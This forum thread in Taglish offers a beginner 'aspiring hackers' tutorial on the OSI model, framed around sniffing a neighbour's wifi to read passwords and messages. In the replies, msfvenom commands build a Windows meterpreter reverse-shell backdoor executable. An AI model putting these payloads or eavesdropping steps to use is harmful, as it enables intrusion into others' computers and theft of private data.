1. Welcome to PHCorner Forums. Take a moment to Sign up and gain unlimited access and extra privileges that guests are not entitled to, such as:

    All that and more! Registration is quick, simple and absolutely free. Join our community today!

Tutorial Aspiring Hackers - Linux Basics Part 5 (Networking Basics 2)

Discussion in 'Linux Distributions' started by Nicolandia15, May 21, 2016.

  1. [​IMG]
    Introduction to OSI Model
    Sino mahilig magbasa? Magbasa ng boring na tutorial. Part 2 ng Networking Basics natin. Goal ko lang talaga dito is para tulungan ang mga wannabe mga tropang hackers natin jan na maintindihan kung ano ang nangyayari everytime we hack. Marunong ka nga mag hack, good if you can follow tutorials pero naiintindihan mo ba ang nangyayari sa likod nito? If hindi importante sa'yo yun, well good luck, kasi sooner or later sarili mo ipapahamak lalo na kung ang intention may sa pag hack ay mejo, sabihin na nating malicious. It goes without saying na kung gusto mong maging hacker, kailangan mo matuto ng Linux.

    Let's begin. Hindi ba astig kung makaka connect ka sa wifi ng kapitbahay mo at nakikita mo lahat ng ginagawa nila? What if ganun lang kadali yun. Isa sa mga tools na ginagamit like Wireshark ang pinakamabisa since ang majority ng LAN or Local Internet Network is based sa shared Ethernet.

    Visualize natin, lahat ng computer at devices sa iisang LAN na naka plug sa iisang wire at lahat ng traffic na dumadaan dito ay pwede nating makita at kunin. Ang Wireshark ay isa sa mga packet sniffer or network analyzer na pwede nating gamitin if you have Kali.

    Anong traffic pinag uusapan natin dito? Actually lahat. Give na yung encrypted data is hindi mo mababasa pero makikita mo pa din at lahat ng hindi encrypted ay mas madali mong kunin. Kasama na dito yung password, logins, email pati pag uusap nila sa messenger. So technically lahat.

    Example, let's say yung wireless card mo may na capture na na packet galing sa ibang network. Normally bago pa lumipad yung packet na yun, alam na dapat ng OS na pinanggalingan niya kung anong klaseng packet ito. To do so, tatanggalin niya yung Ethernet header ng packet at titingnan kung ano next na layer, if IP packet ito, tatanggalin niya ulit yung IP header at check niya ulit kung anong klaseng IP Packet ito. Lastly kunyari nalaman niyang UDP Packet pala ito. Tatanggalin niya ulit yung UDP header at matitira dito ay ang data na ipapasa naman ngayon sa application na nagrequest nito. Magulo ba?

    Yun yung pinaka simple na idea kung ano nangyayari everytime na magrtravel yung packet sa network. Ang point is everytime na ma capture natin yung packet na yun gamit ang packet sniffer like Wireshark, buong buo ito, kasama lahat ng headers and all. Regardless pa kung anong port yan pupunta or kung kaninong device or computer papasok.

    Before naman tayo mag umpisa mag grab ng mga data at silipin ang sekretong buhay ng kapitbahay natin, kailangan natin maintindihan kung ano ang packet at ang concept sa likod nito. Para sakin kasi, mas maganda pa din na alam natin how things work compare dun sa alam lang natin pano gawin.

    Networking Baby!

    Open Source Interconnection (OSI) Model

    [​IMG]
    I know, pasensya na sa diagram
    Huwag na natin gawing complicated to, ang OSI model ay isang basehan kung pano nag ttravel ang isang data galing sa computer mo papunta sa kabila. Naka divide siya sa pitong (7) layers at every layer is in charge dun sa processing ng data at ang bawat layer ay pwede lamang mag interact sa layer na nasa baba or taas nito. Halimbawa nito is yung 5th layer kunyari ay pwede lamang mag interact sa 4th or 6th layer, hindi ito pwedeng tumalon sa 1st layer. Madali lang yan promise.

    Visualize natin ulit, simula tayo sa Application layer pababa, pagdating nito sa next layer, it will be processed then dagdagan ng information particular dun sa layer na kung saan siya. Pasa ulit sa baba, dagdag na naman ng info, paulit ulit hanggang makarating ito sa target niya.

    Basta tandaan niyo lang na bawat layer ay pwedeng mag dagdag or magbawas ng info depende sa kung saang layer.

    Layer 1: Physical
    Ito yung literal na physical stuff na dinadaanan ng data. Ethernet cable, router, Network Interface Controller etc.

    Layer 2: Data Link
    Dito naman ang layer kung saan ang packets mo ay ittranslate as bits (11000100) papunta sa Physical Layer. Ito din ang layer na responsible maglagay ng address sa packets, like MAC Address tsaka yung IP address mo.

    Layer 1 and 2 : Once maka receive ang network mo ng data, galing ito sa wire, wifi basta physical (Layer 1) papunta sa second layer at iintindihin niya yung 1s and 0s. Yung second layer ang mag ccheck kung tama ba ang MAC na naka assign dito at kung para ba talaga sa computer na iyon. Pag tama ang lahat, tuloy tuloy na iyon.

    Layer 3: Network Layer Network layer naman ang responsable sa pag check kung paano i ttransmit yung data sa dalawang computer. Dito rin nangyayari ang translation from your Computer name para maging (MAC Address). Siya din bahala kung saan yung route, taga manage ng network issues etc.

    Note lang sa Layer 3, nakasalalay sa layer na to ang gagawin ng router mo. Depende ito sa information na ginawa from Layer 3. Routers diba are their para mag transmit ng data papunta sa isa pang router. Dito nagagawa ng router sumunod sa tamang protocol and other decisions gamit ang info ng Layer 3.

    Layer 4: Transport
    Transport layer naman ay tumatanggap ng info from Session Layer at hahati hatiin ito sa mga packets para ipasa sa Network Layer. Responsibility ng Transport Layer na makakarating ang mga packets na ito ng buo sa destination device or target.

    Layer 5: Session
    Ang Session Layer naman ang buhay nito ay gawing maayos ang connection or di kaya i-terminate ang connection between sa dalawang device. As long na nag ccomunicate ang dalawang device back and forth, meron tayong connection.

    Imagine your computer, tapos nag bbrowse ka ng web or nag download ng mga files, nanonood ng ÿôutubê or kung ano ano pa. Lahat ng data pumapasok sa computer mo, pero mali naman siguro pag yung ÿôutubê na data ay dun napunta sa Facebook mo. Dito sa layer na to ginagamitan ng port at sinisigurado na tama ang napupuntahang data.

    Layer 6: Presentation
    Presentation layer naman ang bahala mag convert ng data para sa Application at mag convert ng data para sa transmission and vice versa. Kunyari mag ssend ka ng message sa Facebook, sa presentation layer, coconvert niya yung data para sa transmission, kung makaka receive ka naman ng message, coconvert niya yung data na maiintindihan ng Messenger mo. Sa Presentation layer din nangyayari ang encryption ng data para i transmit sa network.

    Layer 7: Application
    Application Layer ang pinaka top ng OSI Model. Dito mo na makikita ang data na na receive mo, data na maiintindihan mo kasi gumagamit ka ng application. Like Facebook for example, email, browser or even Word Processor. Para mas madali, sa application layer, gumagamit ka ng application.

    Boring as hell. Pero trust me pag seryoso ka sa ginagawa mo like hâckïng. This will be very useful in the future. Stay tune for more tutorials.
     
    Last edited: May 26, 2016
    tail cat, mylabs26, gmax02 and 3 others like this.
  2. wannabe poser here
     
    mylabs26 likes this.
  3. What do you mean?
     
    Last edited: May 22, 2016
  4. i mean count me in as wannabe acting poser na hacker...
     
  5. Naah. Binasa mo ba talaga? :p
     
  6. yeah mon..at di lng un kinokomplie ko lhat ng mga basic tuts dito sa section nato..for brighter future..at pag na busted ako ng mga cops ikaw ang ituturo kung master mind hahaha
     
  7. Woah! Ethical hâckïng po ang tinuturo ko. Pwede kita turuan pano gumamit ng baril, but the end of the day, nasa sa'yo yun kung gagamitin mong protection or para pumatay. :p
     
  8. just juking..guns and knives..no.lives in it,dies in it..prank2x lng sa neighbors sa ngayon,if ever a thousand years mag excel man..ill rob those pig capitalist
     
    Nicolandia15 likes this.
  9. Let's keep it healthy na lang (boo!) If you want to test your skill, do it sa sarili mong machine or router. (booo!) :D
     
  10. ok master (BOOOOOring )..
    bakit remote host connect failed po twing ni lalaunch ko ng yung payload ko using armi master?nka vm win7 ko
     
  11. Anong payload po gamit mo? Nag scan ka na ng buong network? Screenshot please. :p
     
  12. master na install naba yung gawa kong .exe kapag naclick ko at nagrestart yung vm ko?sensya na di ako maka SS nka US lang ako

    ito yung gamit ko msfvenom windows/meterpreter/reverse_tcp LHOST= > .exe
    tma ba?
     
  13. Here you go sir. Thanks for reading
    Please or Register to view links

    Ip address mo po ilalagay mo jan. Then sa Lport naman kung san mo siya gusto dumaan na port. Type mo "options" pag nasa metasploit ka for more info tsaka requirement.
     
    Last edited: May 23, 2016
  14. master "backdoor.exe is not a win32 app"?
     
  15. You can call it an app or executable or exploit. Pero yung nilalagay sa Lhost is IP Address. :p Magulo ba naman ba ako.
     
  16. ah??ano?
    yung nga nilagay msfvenom -p windows/meterpreter/reverse_tcp LHOST=canyouseeme.org LPORT=443 > bakdoor.exe....eh nung pag execute ko na sa vm ko yun ang error..
     
  17. Yung ilalagay po ulit sa LHOST is ip address mo tapos yung sa LPORT is yung port na gusto mo gamitin.

    Example

    Code:

       Sorry you need to Register / Login to see this Codes!    

    After nyan check mo kung may mali by using
    Code:

       Sorry you need to Register / Login to see this Codes!    

    Actually di ko gets kung ano gets yung goal dito. Gagawa ka ng payload na .exe ?
     
    Last edited: May 24, 2016